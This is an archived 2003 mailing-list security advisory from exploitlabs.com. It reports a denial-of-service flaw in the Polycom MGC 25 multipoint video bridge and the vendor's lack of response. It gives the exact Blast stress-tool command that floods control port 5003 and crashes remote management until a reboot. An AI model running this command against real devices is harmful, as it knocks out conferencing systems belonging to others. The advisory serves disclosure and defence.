[30710] in bugtraq
DoS - Polycom MGC 25 Control Port
daemon@ATHENA.MIT.EDU (ident@boxfrog.com)
Sat Jul 12 18:42:00 2003
Message-ID: <20030712203137.90038.qmail@www.boxfrog.com>
From: ident@boxfrog.com
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
Date: Sat, 12 Jul 2003 15:31:27 -0500
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
------------------------------------------------------------------
- EXPL-A-2003-014 exploitlabs.com Advisory 014
------------------------------------------------------------------
-= Polycom MGC25 =-
Nutcase
July 12, 2003
Vunerability(s):
----------------
Denial of Service
Product:
--------
Polycom MGC 25 - MCU Ver: 5.51.21
Polycom MGC 25 - MCMS Ver : 5.51.211 ( current )
Polycom MGC 50 - unverified
Polycom MGC 100 - unverified
Description of product:
-----------------------
"The MGC 25 is a robust Multipoint Video and Audio bridge
for organizations with a distributed network, a centralized network or both.
All three platforms ( MGC-25 MGC-50 MGC-100 )
use the same software, share a common feature set and support
the same scheduling and management solutions."
http://www.polycom.com/common/flash/individual_tours/I_MGC25.htm
http://www.polycom.com/common/pw_item_show_doc/0,1449,853,00.pdf
VUNERABILITY / EXPLOIT
======================
tested on Windows XP / 2k
issuing...
blast 10.10.10.10 5003 600 680 /t 7000 /d 300 /b user
( blast is a stress tool from http://www.foundstone.com/Blast )
completly crashes the control port on the remote host
Box must be rebooted to return remote management functionality
Local:
------
yes
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor has not responded
Vendor Contact:
---------------
Concurrent with this advisory
securitycenter@polycom.com
Credits:
--------
Nutcase
id3nt@boxfrog.com
http://exploitlabs.com
exploitlabs.com and nothackers.org thanks Nutcase for his contribution
